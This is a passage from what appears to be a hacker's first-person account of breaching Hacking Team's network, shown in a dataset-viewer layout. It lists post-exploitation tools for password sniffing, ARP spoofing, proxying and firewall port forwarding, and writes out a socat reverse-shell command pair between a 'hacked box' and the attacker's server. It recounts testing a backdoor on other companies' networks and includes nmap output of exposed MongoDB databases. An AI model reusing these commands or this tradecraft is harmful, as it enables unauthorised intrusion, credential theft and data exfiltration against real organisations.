text stringlengths 0 1.99k |
|---|
To execute Responder.py |
5) tcpdump |
For sniffing traffic. |
6) dsniff |
For sniffing passwords from plaintext protocols like ftp, and for |
arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR |
and NaGA, but it was hard to compile it for the system. |
7) socat |
For a comfortable shell with a pty: |
my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port |
hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \ |
tcp:my_server:my_port |
And useful for a lot more, it's a networking swiss army knife. See the |
examples section of its documentation. |
8) screen |
Like the shell with pty, it wasn't really necessary, but I wanted to feel |
at home in Hacking Team's network. |
9) a SOCKS proxy server |
To use with proxychains to be able to access their local network from any |
program. |
10) tgcd |
For forwarding ports, like for the SOCKS server, through the firewall. |
[1] https://www.busybox.net/ |
[2] https://nmap.org/ |
[3] https://github.com/SpiderLabs/Responder |
[4] https://github.com/bendmorris/static-python |
[5] http://www.tcpdump.org/ |
[6] http://www.monkey.org/~dugsong/dsniff/ |
[7] http://www.dest-unreach.org/socat/ |
[8] https://www.gnu.org/software/screen/ |
[9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html |
[10] http://tgcd.sourceforge.net/ |
The worst thing that could happen would be for my backdoor or post-exploitation |
tools to make the system unstable and cause an employee to investigate. So I |
spent a week testing my exploit, backdoor, and post-exploitation tools in the |
networks of other vulnerable companies before entering Hacking Team's network. |
--[ 7 - Watch and Listen ]------------------------------------------------------ |
Now inside their internal network, I wanted to take a look around and think |
about my next step. I started Responder.py in analysis mode (-A to listen |
without sending poisoned responses), and did a slow scan with nmap. |
--[ 8 - NoSQL Databases ]------------------------------------------------------- |
NoSQL, or rather NoAuthentication, has been a huge gift to the hacker |
community [1]. Just when I was worried that they'd finally patched all of the |
authentication bypass bugs in MySQL [2][3][4][5], new databases came into |
style that lack authentication by design. Nmap found a few in Hacking Team's |
internal network: |
27017/tcp open mongodb MongoDB 2.6.5 |
| mongodb-databases: |
| ok = 1 |
| totalSizeMb = 47547 |
| totalSize = 49856643072 |
... |
|_ version = 2.6.5 |
27017/tcp open mongodb MongoDB 2.6.5 |
| mongodb-databases: |
| ok = 1 |
| totalSizeMb = 31987 |
| totalSize = 33540800512 |
| databases |
... |
|_ version = 2.6.5 |
They were the databases for test instances of RCS. The audio that RCS records |
is stored in MongoDB with GridFS. The audio folder in the torrent [6] came |
from this. They were spying on themselves without meaning to. |
[1] https://www.shodan.io/search?query=product%3Amongodb |
[2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql |
[3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html |
[4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c |
[5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html |
[6] https://ht.transparencytoolkit.org/audio/ |
--[ 9 - Crossed Cables ]-------------------------------------------------------- |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.